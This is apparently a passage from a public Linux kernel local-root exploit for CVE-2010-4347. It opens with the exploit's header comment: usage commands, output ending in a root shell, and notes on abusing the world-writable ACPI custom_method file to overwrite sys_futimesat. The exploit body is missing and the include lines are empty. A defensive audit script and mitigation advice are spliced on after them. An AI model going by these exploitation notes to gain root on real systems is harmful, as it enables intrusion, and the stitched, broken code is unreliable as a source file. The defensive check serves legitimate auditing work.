/*
 * american-sign-language.c
 *
 * Linux Kernel <>
 * Jon Oberheide
 * http://jon.oberheide.org
 *
 * Information:
 *
 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347
 *
 * The custom_method file allows injecting custom ACPI methods into the ACPI
 * interpreter tables. This control file was introduced with world-writable
 * permissions in Linux Kernel 2.6.33.
 *
 * Usage:
 *
 * $ gcc american-sign-language.c -o american-sign-language
 * $ ./american-sign-language
 * [+] resolving required symbols...
 * [+] checking for world-writable custom_method...
 * [+] checking for an ACPI LID device...
 * [+] poisoning ACPI tables via custom_method...
 * [+] triggering ACPI payload via LID device...
 * [+] triggering exploit via futimesat...
 * [+] launching root shell!
 * # id
 * uid=0(root) gid=0(root) groups=0(root)
 *
 * Notes:
 *
 * This vuln allows us to write custom ACPI methods and load them into the
 * kernel as an unprivileged user. We compile some fancy ASL down to AML
 * that overrides the ACPI method used when the status of the LID device is
 * queried (e.g. 'open' or 'closed' lid on a laptop). When the method is
 * triggered, it overlays an OperationRegion on the physical address where
 * sys_futimesat is located and overwrites the memory via the Store to
 * escalate privileges whenever sys_futimesat is called.
 *
 * The payload is 64-bit only and depends on the existence of a LID device
 * (e.g. a laptop), but the exploit will still tell you if you're vulnerable
 * regardless. If you don't know how to work around these limitations, you
 * probably shouldn't be running this in the first place. :-P
 *
 * Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
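The precondition the exploit header describes is simply a world-writable control file. The following audit script is an added defender-side example, not part of the original exploit or the kernel; it assumes the debugfs path /sys/kernel/debug/acpi/custom_method, which is only present when debugfs is mounted and ACPI debug support is built in.

```shell
#!/bin/sh
# Added example (not from the original exploit): checks whether the ACPI
# custom_method control file carries the world-writable bit that
# CVE-2010-4347 is about. The path is an assumption about where the
# kernel exposes the file when debugfs is mounted.
CUSTOM_METHOD_PATH="/sys/kernel/debug/acpi/custom_method"

# world_writable PATH
# Exit status: 0 = "other" write bit set, 1 = not set, 2 = PATH missing.
# Parses the mode string from `ls -ld` (column 9 is the "other" write
# flag), which is portable across GNU and BSD userlands.
world_writable() {
    path="$1"
    [ -e "$path" ] || return 2
    other_w=$(ls -ld "$path" 2>/dev/null | cut -c9)
    [ "$other_w" = "w" ]
}

# audit_custom_method [PATH]
# Prints a one-line verdict and passes the check result through as the
# exit status: 0 = exposed, 1 = not world-writable, 2 = not present.
audit_custom_method() {
    target="${1:-$CUSTOM_METHOD_PATH}"
    world_writable "$target"
    rc=$?
    case "$rc" in
        0) echo "EXPOSED: $target is world-writable (CVE-2010-4347 precondition)" ;;
        1) echo "ok: $target is not world-writable" ;;
        *) echo "n/a: $target not present (debugfs not mounted or no ACPI debug)" ;;
    esac
    return "$rc"
}

# Audit the default path when the script is run directly; the printed
# verdict carries the result, so a non-zero status does not abort here.
audit_custom_method "$CUSTOM_METHOD_PATH" || true
```

Fixed kernels dropped the world-writable bit from the file; on an affected system the immediate mitigation is restricting the file's mode or unmounting debugfs until the kernel is updated.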